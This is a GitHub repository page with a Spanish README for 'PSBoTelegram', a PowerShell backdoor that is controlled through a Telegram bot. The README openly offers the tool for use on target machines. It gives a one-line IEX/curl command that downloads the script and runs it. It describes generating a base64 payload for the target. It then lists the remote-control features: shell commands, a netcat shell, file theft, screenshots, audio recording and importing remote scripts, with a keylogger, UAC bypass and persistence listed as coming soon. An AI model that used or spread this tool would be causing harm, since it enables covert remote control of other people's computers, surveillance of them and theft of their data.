Backdoor en powershell vía Telegram
PowerShell
Latest commit 2f3c398 Feb 22, 2017 @cybervaca cybervaca committed on GitHub Add files via upload
Permalink
Failed to load latest commit information.
images Add files via upload Feb 6, 2017
Functions.ps1 Add files via upload Feb 22, 2017
PSBoTelegram.ps1 Add files via upload Feb 13, 2017
README.md Update README.md Feb 10, 2017

README.md

PsBoTelegram

Backdoor using Telegram and Powershell

Podeis probar el script abriendo una consola de powershell y pegando esto:

IEX (curl "https://raw.githubusercontent.com/Hackplayers/PSBoTelegram/master/PSBoTelegram.ps1").content  

    ____  _____ ____      ______     __
   / __ \/ ___// __ )____/_  __/__  / /__   ____ __________ _____ __
  / /_/ /\__ \/ __  / __ \/ / / _ \/ / _ \/ __  / ___/ __  / __  __ \
 / ____/___/ / /_/ / /_/ / / /  __/ /  __/ /_/ / /  / /_/ / / / / / /
/_/    /____/_____/\____/_/  \___/_/\___/\__, /_/   \__,_/_/ /_/ /_/
                                    /____/

                                                 v0.3 by CyberVaca @ Luis Vacas

PSBotTelegram es un script escrito en Powershell que nos crea una backdoor que se conecta a Telegram y se gestiona desde Telegram. Al ejecutar el script nos va a pedir tres datos necesarios para crear el shellcode.

Los datos que nos pide son los siguientes:

Parametros

Parametros

[+] Introduzca el Token del Bot de Telegram: "Aquí deberemos poner el Token del bot que hayamos creado."
[+] Introduzca su Chat ID: "Aquí deberemos poner nuestro ID de Telegram."
[+] Introduzca el delay para la conexión: "En este campo seteamos el delay(retardo) entre en pc con el backdoor y nuestro chat de telegram"

Una vez introducido estos datos, nos creará un shellcode en BASE64 para ejecutarlo en el equipo objetivo.

Funciones del backdoor.

[1]   /Help   (Nos muestra la ayuda)
[2]   /Info   (Devuelve información sobre el equipo)
[3]   /Shell   (/Shell + CmdLet a ejecutar )
[4]   /Whoami   (Devuelve el usuario que ejecutó el codigo)
[5]   /Ippublic   (Nos da IP publica, Pais y Ciudad del Target)
[6]   /Kill   (Mata el backdoor)
[7]   /Scriptimport   (Importa el script de powershell pasandole una url)
[8]   /Shell nc (netcat)   (Función de powercat https://github.com/besimorhino/powercat )
[9]   /Download   (Download mas ruta nos descarga el archivo)
[10]  /Screenshot   (Realiza screenshot y nos lo envia)
[11]  /Audio   (/Audio X, Grabaría X segundos de audio y nos lo envia)
[12]  /Keylogger   (/Keylogger -- proximamente)
[13]  /BypassUAC   (/BypassUAC -- proximamente)
[14]  /Persistence   (/Persistence -- proximamente)